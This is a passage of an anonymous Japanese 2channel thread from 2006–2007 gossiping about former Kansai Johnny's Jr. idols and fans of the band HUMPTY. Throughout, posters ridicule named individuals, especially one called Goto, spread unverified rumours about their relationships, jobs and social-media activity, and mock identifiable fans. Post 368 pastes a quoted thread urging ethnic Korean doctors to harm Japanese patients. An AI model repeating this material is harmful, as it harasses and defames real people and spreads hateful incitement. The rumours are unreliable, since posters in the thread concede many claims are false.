177 :ユーは名無しネ:2006/10/26(木) 14:20:26
2chの書き込み信じるバカはいるのか?

178 :ユーは名無しネ:2006/10/26(木) 14:29:55
>177
後藤の話は本当っぽいから信じるけど、他はウソばっか

179 :ユーは名無しネ:2006/10/26(木) 15:15:22
ここはsage進行だからメル欄にsageと半角で入力してから
書き込めと何回言えばわかるんだゴルァ!

お客様を拒否するつもりはないがルールは理解して呉
後藤祭りも楽しいがそろそろ全角厨ウザ

180 :ユーは名無しネ:2006/10/26(木) 16:36:06
全角の奴ひつこすぎて全部ガセに思えてきた

しょーもな

181 :ユーは名無しネ:2006/10/26(木) 17:11:52
>180
テメーが一番ガセじゃなぃの分かってるだろ
実話だよ!実話!!
ねっ!後藤大祐さん!

182 :ユーは名無しネ:2006/10/26(木) 17:20:21
久々回ってると思ったらHUMPTYの自演ヲバが暴れてただけかよ

183 :ユーは名無しネ:2006/10/26(木) 17:23:02
自覚症状がなく鏝ってるヤシ多いな(w

184 :ユーは名無しネ:2006/10/26(木) 17:29:23
>169
自分行きますノシw
当日券\3000出して見に行ってくる

185 :ユーは名無しネ:2006/10/26(木) 17:33:18
>182
HUMPTYの自演ヲバって何の話だ?w

186 :ユーは名無しネ:2006/10/26(木) 17:49:49
>182
それ私も興味ある〜w

187 :ユーは名無しネ:2006/10/26(木) 21:02:54
後(ry とハンプティヲバはもうアキタ
ハンプティ話はいつも同じ話になる

188 :ユーは名無しネ:2006/10/26(木) 22:54:16
元関ジュで みやまっていた?

189 :ユーは名無しネ:2006/10/26(木) 22:58:51
三好真ならD-BOYSの新メンバーに選ばれたな

190 :ユーは名無しネ:2006/10/26(木) 23:17:40
下の名前じゅんなんだけど…
知ってる人いません?

191 :ユーは名無しネ:2006/10/27(金) 01:24:11
三好結局選ばれたのかオメ

192 :ユーは名無しネ:2006/10/27(金) 01:31:28
>182
HUMPTYの自演ヲバってヲバギャルの事?w
明日も来て最前列で邪魔するんだろうな
そして純弥の身内に近付くんだろうな

193 :ユーは名無しネ:2006/10/27(金) 01:33:43
後藤相当ショックだったみたいであんなにしょっちゅう開いてたミクシィを開いてないじゃんw

早く辞めればいいのにw

194 :ユーは名無しネ:2006/10/27(金) 02:14:29
ヲバギャルってどんな人?
誰担なん?

195 :ユーは名無しネ:2006/10/27(金) 02:45:23
ヲバギャルの意味教えて栗

196 :ユーは名無しネ:2006/10/27(金) 06:00:53
オバギヤルは純弥担で特攻服隊の一人 ギヤル装ってるケドよくみるとオバってコト おデブ二人とダサイ玉も張り切って来るんだろ最近ココにも書かれなくなったから安心して楽しんでるのかもしれないケドファン確実におまえらのせいで減ってるし
たまには最前列を皆様に譲る謙虚さはないのかだよ ワンマンくらい譲れ
泣いて後ろに居たのが懐かしいな

197 :ユーは名無しネ:2006/10/27(金) 06:25:58
ヲタの話はヨソでやって

198 :ユーは名無しネ:2006/10/27(金) 06:38:55
ココしか書くトコなくてスマソ
オバ辞めてくれないかな純弥クンは皆のものよワラ
ダサイ玉もあれだけ嫌われて来るコト出来るってスゴイ私なら担当の前に行けないしある意味羨ましい

199 :ユーは名無しネ:2006/10/27(金) 08:32:25
ダサイ玉は嫌われてるの十分わかってるよw
だから北山が気に入る物を渡して、気に入られるように努力してるw
物を渡そうが嫌われてるには間違いないけれどもww

200 :ユーは名無しネ:2006/10/27(金) 09:45:16
イパーン人の話はヨソで汁!
ここは元関ジュを語る場であってイパーン人について書く場ではナス

>198
2ちゃんねるだからと言って全てが許されるわけではナス
「ここしか書くトコなくてスマソ」と言っておけば免罪符になると思うのは大間違い
ここにはここのルールがあるから守って呉

201 :ユーは名無しネ:2006/10/27(金) 10:03:39
そのヲバヲタはオキニだと思っているのか?

202 :ユーは名無しネ:2006/10/27(金) 10:20:51
メンバー全員に気に入られてるって思ってるよww
じゃなきゃヘラヘラ全員に話かけにいかないでしょw

203 :ユーは名無しネ:2006/10/27(金) 11:20:43
後藤って誰
名鑑載ってる?

204 :ユーは名無しネ:2006/10/27(金) 11:57:54
>203
名鑑4は98年の狂都面ほぼ全員載ってるから載ってるとオモ

205 :ユーは名無しネ:2006/10/27(金) 12:09:23
ダサイ玉は何をあげて北山くんの機嫌をとってるの?気になる

206 :ユーは名無しネ:2006/10/27(金) 12:17:05
>205
何をあげてるかは知らないですww

207 :ユーは名無しネ:2006/10/27(金) 13:34:00
ダサイ玉は関西の人?何処のLIVEにも出没してる?

208 :ユーは名無しネ:2006/10/27(金) 14:20:32
ダサイ玉はダサイ玉だよw
でも何処でも出没しやがる!

209 :ユーは名無しネ:2006/10/27(金) 14:58:27
ダサイ玉はミクシにいる?

210 :ユーは名無しネ:2006/10/27(金) 16:50:58
やはり携帯厨がsage進行を理解していないようだな
定期的に書くしかないのかorz
そしてスレチのヲタ話はいい加減に汁!
ヲタ話は該当スレに池

211 :ユーは名無しネ:2006/10/27(金) 21:52:41
北山の彼女来てた
北山女の趣味変わった・・・
目をひく美人だった

212 :ユーは名無しネ:2006/10/28(土) 20:19:35
HUMPTYの話なんか興味ないお ( ´ ・ ω ・ ` )

213 :ユーは名無しネ:2006/10/28(土) 21:45:36
>211
北山側に居た?

214 :ユーは名無しネ:2006/10/29(日) 00:10:36
北山の彼女ってなんで知ってるん?北山の知り合いなん?

215 :ユーは名無しネ:2006/10/29(日) 00:25:49
特攻服隊は最前列にいようが特攻服着ようが構わないがライブハウスのトイレで着替えるのをやめてほしい
あれは迷惑!

216 :ユーは名無しネ:2006/10/29(日) 00:54:35
同感!しかも狭いライブハウスだと他のバンドの人にも迷惑だし実際他の人にマナー悪いって言われてたから
ライブハウスのトイレは使わない方法で来て欲しい

217 :ユーは名無しネ:2006/10/29(日) 19:02:50
前に純弥に特攻服隊の奴らマナーなってないんだけどって言ったら、「そうやねん!なんか勘違いしてるみたいでさー毎回ライブに来てくれてるのはありがたいんだけど、毎回来てるから許されると思ってるみたいやわ!自分あいつらの教育したってくれへん?」って言われた
最近東京のライブに行ってないからわからないけど、まだあの子らわかってないんだねw
久々の関西ワンマンにも現れるのか?
勘弁してくれって感じ

218 :ユーは名無しネ:2006/10/29(日) 20:24:12
↑性格悪ッッ
純弥クンも馬鹿じゃないからそんな面倒なコト言わないから。直接知ってるけどファンの悪口は言わないよ。
そーゆー書き込みするコトでHUMPTYのレベルまでさげてらっしゃるのでは?

219 :ユーは名無しネ:2006/10/29(日) 23:17:48
ハンプティはなんてゆーバンド名になったんだ?

220 :ユーは名無しネ:2006/10/30(月) 08:30:11
>>218
アンカーの使い方も分からないのか!?
ハウス!!!!!

221 :ユーは名無しネ:2006/10/30(月) 08:54:29
↑_
タヒね

222 :ユーは名無しネ:2006/10/30(月) 21:12:08
向井一貴って今どうなってるん??

223 :ユーは名無しネ:2006/10/31(火) 00:00:12
あのHUMPTY

224 :ユーは名無しネ:2006/11/01(水) 20:53:21
>218
純弥の何を知ってるって?純弥はファンの悪口言いまくりやぞw
あだ名まで付けて楽しんでるw

225 :ユーは名無しネ:2006/11/01(水) 21:02:36
今回HUMPTYのワンマンに行って感じた事

ファンクラブ発送のNO入りチケットがヤラセだと言う事!
前の方の番号はいつも同じ人ばかり
そろそろファンクラブの更新時期なのだが、ファンクラブに入る意味があるのだろうか?

226 :ユーは名無しネ:2006/11/01(水) 22:30:18
同じ人だから何?しょうがないんじゃない?前が欲しいなら必死で振込み頑張ってみたらよいし
そんなに前でみたいならあなたも特攻服着て友達になればいいし
でもこう書いたら特攻隊の一人と思われるんだよね みんな仲良く出来たらいいけど無理だよね

227 :ユーは名無しネ:2006/11/01(水) 23:15:51
特攻服の奴らとは言ってないですよw
ファンの皆さんに迷惑かけてまで仲良くして特攻服着たいと思わないですしw
振り込みを早いからといってNOが早くなるとは限らないって関係者の方が言ってたのに結局は振り込みを早くした人がNOがいいって事を言ってるだけです
ファンクラブのやり方に疑問をもっただけですよw

228 :ユーは名無しネ:2006/11/01(水) 23:50:15
じゃあ直接ファンクラブに電話したらいいと思いますここに書いても...
って言うかやっぱり関西にも特攻隊来てたってとこがうざい...

229 :ユーは名無しネ:2006/11/01(水) 23:53:55
オマイラせめて半角カタカナを使って呉orz

230 :ユーは名無しネ:2006/11/02(木) 00:09:22
>228
字読めねーのか?w
ファンクラブの関係者には言ったんだよ!
言ってた事とやってる事が違うからハラがタツんだよ!ヤラセだってわかった以上ファンクラブに入ってる意味ねーじゃん
しかも、ファンクラブが出来た当初はファンクラブに入ってる人しか先行のチケットは取れないし、会員の人が会員でない人の分を取っても、開場の時に会員証を見せて入るから会員でない人は入れないはずなのに、今回のワンマンは会員でない奴がいいNOってのが納得いかねー
グループの一人が入ってればいいなら最初にそんな事言ってファンクラブに入れるなんて、だましじゃん

231 :ユーは名無しネ:2006/11/02(木) 00:14:57
すごい怒りですね...
何度も電話してみたらいいと思いますよ
そんなに前でみたいんですか? 最前列だからって何か良い事でもあるんですか?

232 :ユーは名無しネ:2006/11/02(木) 00:26:03
前で見たいとか見たくないとかじゃなくて会員の人に対して公平にしてほしいって事です
年会費って金を取ってる以上はちゃんと運営をしてほしいです
会場で売ってたチケットもファンクラブよりNO早いってスタッフが言ってたけど、これもどうなることやらw
中途半端なやり方なら金を取るファンクラブなんてやらなきゃいいのにな!

233 :ユーは名無しネ:2006/11/02(木) 00:30:36
てかファン少ないのにファンクラブ作る事が間違ってる
東京なんか20人いない時あるじゃん

234 :ユーは名無しネ:2006/11/02(木) 00:40:11
じゃ更新しなくていいですよ ファンはこれから増えるから大丈夫

235 :ユーは名無しネ:2006/11/02(木) 00:46:35
更新しなくていいって事は会員のみんなが公平でないやり方を貫くって事ですね!
ファンがこれから増えるんですかw
今は特攻隊のお蔭でファンが減ってるって聞きましたけどw

236 :ユーは名無しネ:2006/11/02(木) 01:34:56
減ってるファンの一人(・∀・)ノ
だってアレはドン引くだろうにorz

237 :ユーは名無しネ:2006/11/02(木) 02:18:06
すんr

238 :ユーは名無しネ:2006/11/02(木) 12:51:22
初めてライブ見に行った時、衣装がちょっとキモくて引いたwあれじゃファン減るってw

239 :ユーは名無しネ:2006/11/02(木) 14:15:04
ここは元関西Jr.のスレであってファンクラブの愚痴を言うところではナス


と亀レスをつけてみるテスト(w

240 :ユーは名無しネ:2006/11/02(木) 14:52:36
>238
衣装がキモイのはHUMPTYの衣装の事?w

241 :ユーは名無しネ:2006/11/02(木) 17:05:24
野中はやめて正解

いっその事解散してリーマンになりゃいいのに。
きしだんが好きなのか、ヤンキーにまだ憧れてるのか、
とにかくあの衣装はキモイだけー

242 :ユーは名無しネ:2006/11/02(木) 17:36:25
>240
そうw
キモイっていうより痛い…

243 :ユーは名無しネ:2006/11/02(木) 18:17:53
好きでやってるし誰かに迷惑かけてるわけじゃないしほっとけばw
HUMPTYをキモイって思う人はもうライブ来なくていいです

それよりミクシィでジャニファンのとこに片っ端から足跡付けてるニート後藤のほうがキモイ!
Jrに入れたのは手違いだって事わかってなし、まだまだいけるって思ってるから笑けるw

244 :ユーは名無しネ:2006/11/02(木) 19:23:49
後藤マジでキモス
ミクシィで私のとこにも足跡ついてた
一週間後にまた足跡ついててマジでキモくて怖くなった

245 :ユーは名無しネ:2006/11/02(木) 23:14:05
>244
マイミクなん?


246 :ユーは名無しネ:2006/11/03(金) 01:02:08
>245
マイミクではないです
足跡がついてたので一回だけ見に行っただけなのに、それから五回以上は私のとこに覗きにきます。それが怖くて一度mixi辞めて、またmixi始めたけど今は平和ですW

247 :ユーは名無しネ:2006/11/03(金) 01:31:10
>>246
mixiやってるのにアク禁知らないんですか?w

248 :ユーは名無しネ:2006/11/03(金) 01:40:42
>243
特攻服隊キター!!!!w
逃げろ〜!!!w

249 :ユーは名無しネ:2006/11/03(金) 02:01:57
>248
キモスニート後藤キター!!!!w
逃げろ〜!!!w

250 :ユーは名無しネ:2006/11/03(金) 02:09:20
>>243
臭いを嗅ぎ付けてきたオバオタ乙〜

251 :ユーは名無しネ:2006/11/03(金) 02:22:34
特攻服隊でもオバオタでもないが、後藤!自分が叩かれてるからって話題を変えようとするな!
所詮キモイ後藤は叩かれるだけ有り難いとおもえw

252 :ユーは名無しネ:2006/11/03(金) 09:04:02
だから後藤ネタもういいって…
最初から興味無いし

253 :ユーは名無しネ:2006/11/03(金) 09:17:28
関西にはまともな辞めジュはいないのか

254 :ユーは名無しネ:2006/11/03(金) 11:16:06
呉やマッキーや晴司はまだマトモだとオモ。
今は落ち着いてるし他の奴みたいに無駄なあがきをしない平和な道を選んでる。
マッキーは少しもったいないがorz

255 :ユーは名無しネ:2006/11/03(金) 12:19:29
そういや晴司って今なにしてんの?

256 :ユーは名無しネ:2006/11/03(金) 13:43:08
東京出て仕事してるって聞いたけど今はどうなんやろ…

257 :ユーは名無しネ:2006/11/03(金) 16:12:29
晴司東京にまだいてる

258 :ユーは名無しネ:2006/11/03(金) 16:21:01
ジャニーズっていう肩書きは デカいからね〜 辞めたんだから放置でよくない? 未練がましいのはヲタ達のほうじゃん

259 :ユーは名無しネ:2006/11/03(金) 17:31:25
辞めた奴の事なんてどうでもいい。ミクシィの話も。今は一般人なんだから。

260 :ユーは名無しネ:2006/11/03(金) 17:45:35
じゃぁここくんなよ

261 :ユーは名無しネ:2006/11/03(金) 17:56:35
一般人でない方も何名かいるんですが

262 :ユーは名無しネ:2006/11/03(金) 21:47:43
野中は何してるんだ?
確かにハンプティ辞めて正解だな

263 :ユーは名無しネ:2006/11/03(金) 22:29:37
>262
ロムれ

264 :ユーは名無しネ:2006/11/03(金) 23:07:57
HUMPTYはあのHUMPTYと改名されました 皆様気をつけましょう
それにしてもオバぎゃる筆頭にウザイ 最前列譲れよ

265 :ユーは名無しネ:2006/11/03(金) 23:39:25
オバギャルか何か知らんけど純弥達マジで嫌がってるやん笑
でも数少ない大事なファンやから強く言えんみたいやな
普通のファンがもっと増えたら良いんやろうけどあのハンプティのスタイルじゃ氣志團と被っててキツイだろな

266 :ユーは名無しネ:2006/11/03(金) 23:52:27
女寺クンは何してるか
知ってるかたいませんか?結婚したかなぁ?

267 :ユーは名無しネ:2006/11/03(金) 23:57:02
オパギャルは特攻服着るなら着るで着てればいいのに上は羽織らず肌を露出してやがる
もう若くないのだから考えて肌を出しなさいw

268 :ユーは名無しネ:2006/11/04(土) 00:05:28
オパギャルは本当に意味わかんねえ
露出しすぎ!w
そんなに見せたいなら裸で歩けばいいのにw
あいつらメンバーにわがまま放題だしな
オパギャルはよくボディタッチをよくしてるんだけど、この間北山が小さい声で触れんな!って言ってたしなw
あれを聞いた時はマジ焦った
オパギャルは気づいてなかったみたいで触り続けてたがなw

269 :ユーは名無しネ:2006/11/04(土) 00:14:14
>266
その点、プロレスラーのデブはちゃんと上も着てるよなw
あのはちきれんばかりの肌を出されちゃ皆倒れちまうからなw

特攻服って上下着て意味があんのになw
純弥は歌って踊って汗だくでやってんだから、特攻服着るならちゃんと着な

270 :ユーは名無しネ:2006/11/04(土) 09:09:38
マジでか北山可哀想だな。ファンである事は悪い事じゃないがメンバに迷惑かけないで呉orz

271 :ユーは名無しネ:2006/11/04(土) 09:33:42
メンバを友達と勘違いしすぎ ダサイ玉もいい加減諦めたらイイのに ダサイ玉が話かけた時のあの北山の表情...可哀相...嫌がってるの誰か教えてあげた方が...プロレスラーも態度でかすぎ

272 :ユーは名無しネ:2006/11/04(土) 13:31:09
中本君元気?

273 :ユーは名無しネ:2006/11/04(土) 17:27:52
何人ぐらいミクシしてる?

274 :ユーは名無しネ:2006/11/04(土) 17:38:34
有名なのは純弥と後藤の2人じゃない?
あとは党受の榎本とか

275 :ユーは名無しネ:2006/11/04(土) 21:02:05
>273
北山・純弥・後藤・国分博・魚谷

276 :ユーは名無しネ:2006/11/04(土) 23:20:03
国分?マジ?w

277 :ユーは名無しネ:2006/11/04(土) 23:28:31
>276
いるよ

278 :ユーは名無しネ:2006/11/05(日) 00:45:18
オバぎゃる達の反論はないのかな つかあるわきゃないか また泣いて出てくるかも
つかオバぎゃるが泣くわけね〜つぅのとりあえず皆の為に三回か四回くらい後ろで見てくれない?ほら今読んでる本人さん

279 :ユーは名無しネ:2006/11/05(日) 02:27:55
ハンプティ行きたいけど変なファンが多いって聞いて行く気失せた。
純弥達にこんなファンがいると誰か伝えて呉(w

280 :ユーは名無しネ:2006/11/06(月) 00:34:20
変ナ人達いるけどライブは楽しいデスよ〜来る価値ありあり

281 :ユーは名無しネ:2006/11/06(月) 02:18:10
呉村もいる

282 :ユーは名無しネ:2006/11/07(火) 00:33:10
ミクシィやってる元ジュって何人!?

東京と関西合わせて確実にわかるのは12人なんだけど。もっと知ってる人いたら教えて欲しい。

283 :ユーは名無しネ:2006/11/07(火) 12:26:38
呉村ミクシやってんの?

284 :ユーは名無しネ:2006/11/07(火) 21:53:14
その12人教えてヽ(^^)
呉村やってる

285 :ユーは名無しネ:2006/11/07(火) 23:25:30
皆公開でやってるん?

286 :ユーは名無しネ:2006/11/08(水) 00:14:14
282で書き込んだ者ですが・・・。
>>284
ここに名前出てない人だと古屋や原裕太とかいます。

287 :ユーは名無しネ:2006/11/10(金) 00:22:55
キンピラとこに新加入したヤシは元甘受?

288 :ユーは名無しネ:2006/11/11(土) 00:35:54
新メンは甘受じゃない

289 :ユーは名無しネ:2006/11/11(土) 04:58:31
後藤懲りずにまた日記更新してる。ワラ
お前どんな髪型しても一緒だよ!

290 :ユーは名無しネ:2006/11/11(土) 05:06:47
<<289 十年ROMれ。

291 :ユーは名無しネ:2006/11/11(土) 07:15:20
オマイも一緒にロムっとけ

292 :ユーは名無しネ:2006/11/11(土) 12:04:49
>289
どんな日記書いてる?
また自分の写真載せてるとかとことんキモス
ちゃんとハゲ隠せてるのかw

293 :ユーは名無しネ:2006/11/11(土) 14:34:54
>>192マイミクじゃないの?

294 :ユーは名無しネ:2006/11/11(土) 14:36:01
間違えた>292

295 :ユーは名無しネ:2006/11/11(土) 14:48:30
高杉政治郎はまだホスト?
大樹はなにしてる?

296 :ユーは名無しネ:2006/11/11(土) 16:05:38
>294
ミクシイやってません
友達がミクシイやってるから前にみせてもらったw

297 :ユーは名無しネ:2006/11/11(土) 21:14:54
大樹気になる!!話題出ないし何もきかない…
かなり男前だったのに

298 :ユーは名無しネ:2006/11/12(日) 05:51:39
六本木張り切っていきましょ デモまたやつらがうざい...

299 :ユーは名無しネ:2006/11/12(日) 21:42:15
>298
嫌なら喋らなければいいのに何故仲のいいふりして喋る?
特攻隊を叩いてる奴って身内らしいなw
そんなに嫌なら直接本人らに嫌言いな!直接言えないならココに書くな!

シュフらなんて直接言いたいこと言って、あいつらから離れたしなw
離れて正解だよってメンバーもメンバーの身内も言ってるしなw

300 :ユーは名無しネ:2006/11/13(月) 08:55:35
>>298>>299
ここは 元関西Jr のスレです
スレタイを声に出して200回読みましょう

301 :ユーは名無しネ:2006/11/13(月) 09:39:48
また下らないネタで回ってたのかorz

302 :ユーは名無しネ:2006/11/14(火) 03:57:13
http://m-pe.tv/u/page.php?uid=momo0515&id=1

303 :ユーは名無しネ:2006/11/15(水) 09:25:47
ここに書いてある元Jrの話ってほんと嘘多いね
はじめから読んでびっくりした
僻みっぽいのも多いし
書かれてる子達はかわいそうだね

304 :ユーは名無しネ:2006/11/15(水) 10:00:55
>303
とりあえずsage進行は守って呉

305 :ユーは名無しネ:2006/11/15(水) 12:14:41
>303
元Jrの事何でも知ってんのか
少なくとも後藤の事はマジ話ですよw

306 :ユーは名無しネ:2006/11/15(水) 17:21:46
おまえがゆーと嘘くさい

307 :ユーは名無しネ:2006/11/15(水) 19:20:01
>306
おまえって誰?W

308 :ユーは名無しネ:2006/11/17(金) 02:40:10
一哉

309 :ユーは名無しネ:2006/11/17(金) 02:42:00
大堀大丈夫?

310 :ユーは名無しネ:2006/11/17(金) 02:42:03
Leadのあいつは恥さらし

311 :ユーは名無しネ:2006/11/17(金) 08:59:30
sageろよ!!!

312 :ユーは名無しネ:2006/11/17(金) 12:55:37
福原まだ服屋なん?

313 :ユーは名無しネ:2006/11/17(金) 14:37:31
永田剛司くんって知ってる方いますか?
今何してるかわかりませんか?

314 :ユーは名無しネ:2006/11/17(金) 17:59:12
>>312
>結婚シタって聞いた

315 :ユーは名無しネ:2006/11/17(金) 22:47:51
>>314
>>312
>してないしね

316 :ユーは名無しネ:2006/11/17(金) 22:52:30
暇ならume手伝ってください
http://news18.2ch.net/test/read.cgi/slotj/1154931478/l50

317 :ユーは名無しネ:2006/11/18(土) 00:37:46
元関西Jr発見


http://rknt.jp/entry.php?in_id=3005109&id=P1GP

318 :ユーは名無しネ:2006/11/18(土) 09:56:10
http://tv7.2ch.net/test/read.cgi/jr2/1152867739/3

319 :ユーは名無しネ:2006/11/27(月) 19:26:53
http://www.zasshi.com/ZASSHI_SOKUHOU/data/flash.html
矢口真里<噂の彼氏>と深夜の大ハシャギ宴会 矢口真里、元ジャニーズJr.・魚谷輝明 

320 :ユーは名無しネ:2006/11/28(火) 00:57:06
矢口

何人くうねん

321 :ユーは名無しネ:2006/11/28(火) 02:20:36
>320
(矢ー口)全部喰ってやる

322 :ユーは名無しネ:2006/11/28(火) 02:49:39
>321
クロサギ矢口ktkr

323 :ユーは名無しネ:2006/11/28(火) 07:36:07
(〜^◇^)<魚っちを美味しくいただきましたギャハハ

324 :ユーは名無しネ:2006/11/28(火) 09:33:58
小栗からかなり格下げしたね
魚っち矢口に食わしてもらえ

325 :ユーは名無しネ:2006/11/28(火) 14:28:50
矢口真里、ホスト風イケメンと深夜の三軒茶屋デート!

元モーニング娘。の矢口真里がホスト風イケメンの男性とデートしていたという
しかも、その男が“ヒモ”状態だというから驚きだ。
9月17日夜、三軒茶屋駅近くの隠れ家的な居酒屋で見るからに
“お水”同士のカップルが来店。その女性が矢口だったという。
2人はお互いを「マリ」「テル」と呼び合う親密ぶり。
会話の主導権は意外にもテルくんだ

そのテルくん、どんな男性かと思えば・・・。
(以下要約引用)(居酒屋での様子)
・タバコが切れると店員を呼び注文。
「お金はタバコと引き換えでいいですか?」と常識知らず。
・店員がタバコを買って戻ってくると「ありがとう」の言葉はなく
「遅ぇーよ!マリがゲームに負けて、壁に穴開けそうになってたよ」と失礼な発言。
・食事を終え、お会計で「オレ500円でいいかな?」と矢口に言う。
(お酒や料理をがっつり注文している)
矢口は「いいよ。私カードあるし」と答える。
なんとも小さい男だ。ヒモ状態である。
しかし、この男が矢口の彼氏だという話も・・・

小栗にフラれて矢口もどうかしてしまったかと疑ってしまう。
破局報道から3ヶ月、今は仕事に専念して、
常識あるいい男性と交際してもらいたい限りだ。

326 :ユーは名無しネ:2006/11/28(火) 18:19:27
この記事が本当なら魚っちって
当時のヤンキー系関ジャニの中でも好青年って感じだったから
意外だわ!!!関ジャニ残ってたらいい線いってたと思うんだけどなぁ


327 :ユーは名無しネ:2006/11/28(火) 21:37:05
Kyotokyoから体質かわっとらんなage

328 :ユーは名無しネ:2006/11/28(火) 22:18:01
今西章戸ってどんなコだったっけ?

329 :ユーは名無しネ:2006/11/29(水) 07:41:32
当たり前のことなんだけど歳とってんだよなー
(26)って年齢表記に軽く
衝撃受けたよ。
そうだよな…牧山はもう所帯持ちだってのに
何してんだ魚っち。

330 :ユーは名無しネ:2006/11/30(木) 09:37:44
酒癖悪かったしな魚っち…



331 :ユーは名無しネ:2006/11/30(木) 19:38:10
>325
これ何の記事?
FLASHじゃないよね
魚っち今だに壷の元甘受スレに書かれるの気にしてる
みたいだけど忘れ去られるよりマシだと思うんだが(w
今のファソも大概その頃からのヤシだろうし

332 :わるむ:2006/12/01(金) 00:01:01
ゴシップからの引用だべさ

333 :わるむ:2006/12/01(金) 00:02:02
↑ゴシップからの引用だべさ

334 :ユーは名無しネ:2006/12/01(金) 02:39:51
魚谷好きだったな〜
ナツカシス

335 :ユーは名無しネ:2006/12/01(金) 02:43:11
矢口ならいいんじゃないの
少しは売名にもなるかもしれんしw

336 :ユーは名無しネ:2006/12/01(金) 17:16:56
魚っちそんなヒトだったんだ〜引いた

337 :ユーは名無しネ:2006/12/04(月) 02:21:51
引いたってw
本人同士好きで付き合ってるんだしwww

338 :ユーは名無しネ:2006/12/05(火) 16:22:43
ネタない

339 :ユーは名無しネ:2006/12/05(火) 16:58:57
私のお兄ちゃん先月結婚式行ってたけど結婚した子元関ジャニだって
私全然年離れてるから誰かわからんけど

340 :ユーは名無しネ:2006/12/07(木) 00:16:45
梅阪剛は?

341 :ユーは名無しネ:2006/12/08(金) 10:46:20
魚谷、飲み屋の店長になったんだ
同じ飲食業なんだから牧も誘ってやってくれyo!

342 :ユーは名無しネ:2006/12/08(金) 10:49:35
>339 誰か気になる…
>341 俳優は辞めたの?

343 :ユーは名無しネ:2006/12/08(金) 10:57:45
辞めたかどうかはわからないけど、店長として仕事始めたみたいだよ
バイクショップや飲み屋やりながら俳優って人もけっこういるし、
しばらくは兼業なんじゃない?

344 :ユーは名無しネ:2006/12/08(金) 11:01:55
やっぱ俳優だけじゃ厳しいんだね
魚っちガンバレ〜

345 :ユーは名無しネ:2006/12/08(金) 11:29:45
牧も、去年の夏か秋頃から飲み屋のバイト始めて
最後のほうはそっちの収入のほうが事務所からの
給料より高かったとか聞くもんなぁ

店わかってるから、今度行ってみようと思ってる

346 :ユーは名無しネ:2006/12/08(金) 21:22:21
へ〜
何処?なんて事は言わないから
もし行ったら元気だったかだけ教えて欲しい

347 :ユーは名無しネ:2006/12/08(金) 22:22:09
>345
どこ?

348 :ユーは名無しネ:2006/12/09(土) 13:09:36
魚っちミクシしてた?

349 :ユーは名無しネ:2006/12/09(土) 13:30:28
>348
してる

350 :ユーは名無しネ:2006/12/09(土) 18:16:59
牧山はやってへんのかな

351 :ユーは名無しネ:2006/12/10(日) 10:04:48
魚谷は六本木だけど、牧はまだ尾山台の居酒屋でしょ
店長だかマネだかになったって話も聞くけど

352 :ユーは名無しネ:2006/12/10(日) 16:47:43
>351
詳細キボンヌ


353 :ユーは名無しネ:2006/12/11(月) 08:56:03
魚、26日は瑞丸と一緒にイベントかー

354 :ユーは名無しネ:2006/12/12(火) 01:45:54
>339 誰なん!?

355 :ユーは名無しネ:2006/12/13(水) 03:08:28
過疎

356 :ユーは名無しネ:2006/12/15(金) 09:53:18
瑞丸、イベントキャンセルになったんだな

357 :ユーは名無しネ:2006/12/15(金) 22:07:37
もげはせって今何してるの?

358 :ライブ:2006/12/16(土) 20:53:28
この前特攻服軍団いた?

359 :ユーは名無しネ:2006/12/16(土) 21:23:46
>いつの?

360 :ユーは名無しネ:2006/12/16(土) 22:57:23
あるメンバーから聞いたけど関西のワンマンにも特攻服のやつら行くらしいぞ

361 :ユーは名無しネ:2006/12/17(日) 04:10:01
>357
気になる

362 :ユーは名無しネ:2006/12/17(日) 21:40:32
もげはせ居酒屋でバイトじゃないの?

363 :ユーは名無しネ:2006/12/18(月) 16:33:39
大堀治樹??タウンワークにのってた!!本人にそっくり
http://r3.ne7.jp/t/t.jsp?i=CIEVYEx6plJ0
(

364 :ユーは名無しネ:2006/12/18(月) 17:22:11
ここにも居た。
http://www.onecmatch.com/tc/on/list.php?m=405

365 :ユーは名無しネ:2006/12/29(金) 22:17:41
進也なにやってんの?

366 :ユーは名無しネ:2007/01/04(木) 10:29:49
>357
三宮でキャッチのバイト
激しく汚いギャル男になってる

367 :ユーは名無しネ:2007/01/04(木) 11:57:07
>365
彼女とラブラブ

368 :ユーは名無しネ:2007/01/04(木) 12:02:18
http://cocoa.2ch.net/hosp/kako/1002/10029/1002904514.html
1 名前: 在日医師Red 投稿日: 01/10/13 01:35 ID:???

日常生活では差別は受けたことないけど、
2ちゃん見ていると、朝鮮民族に対して
差別的な発言が目立ち、なにかとムカツク。

近畿地方では、医師の中にかなりの割合の(約10%?)
在日がいる。もちろん俺もその一人。

ネットしていてむかついた腹いせに、日本人の患者を血祭りに上げませんか?

4 名前: 卵の名無しさん 投稿日: 01/10/13 01:39 ID:???

>>1
っていうか俺も在日だけど、そんなことわざわざ言わなくても黙って実行すりゃいいこと。
表ざたにする必要なし。我々はやろうと思ったらなんでもできる立場にあるんだから。


http://society4.2ch.net/test/read.cgi/hosp/1164349051/現スレ

369 :ユーは名無しネ:2007/01/04(木) 19:48:08
>366
もうズニアじゃないから関係ないけど汚ギャルにだけはならないでホスィ


370 :ユーは名無しネ:2007/01/05(金) 08:21:24
米原幸佑(?)って人って元関ジュですか?

371 :ユーは名無しネ:2007/01/06(土) 03:25:30
http://www.fullmedia.jp/lemon/006/006.html

魚…

372 :ユーは名無しネ:2007/01/06(土) 03:46:53
>>371
出演作品に入れたくないくらい本人にとって黒歴史なんだろw

373 :ユーは名無しネ:2007/01/06(土) 23:25:13
米原君はRun&Gun

374 :ユーは名無しネ:2007/01/07(日) 22:53:07
牧山、復帰するみたいだね

375 :ユーは名無しネ:2007/01/08(月) 12:26:10
怖いよ牧
ttp://dir.yahoo.co.jp/talent/20/m01-0314.html

376 :ユーは名無しネ:2007/01/08(月) 22:02:49
復帰すんのか?

377 :ユーは名無しネ:2007/01/09(火) 02:09:55
有働帰ってきて、今どうしてる?

378 :ユーは名無しネ:2007/01/09(火) 02:54:37
もげはせは成人式行ったのか能

379 :ユーは名無しネ:2007/01/09(火) 09:15:32
>>376
みたいだね
家族構成に「妻 娘」って入ってるから、移籍後のプロフィールってことだろうし

380 :ユーは名無しネ:2007/01/10(水) 20:29:25
環八あたりと未だ交流あるヤシっているのかな?

381 :ユーは名無しネ:2007/01/10(水) 21:44:41
去年の牧の舞台にはそういうの何人か来てたよ
舞台の最中もハナシと全然関係ないトコで笑ったり
ごにょごにょ話してたりしてうるさくて、彼氏が
ブチ切れそうになってた


382 :sage:2007/01/14(日) 19:31:33
他提示板で野中でき婚ってたけど、

またがせネタ?

383 :ユーは名無しネ:2007/01/14(日) 20:59:00
>382
sageれてないよ

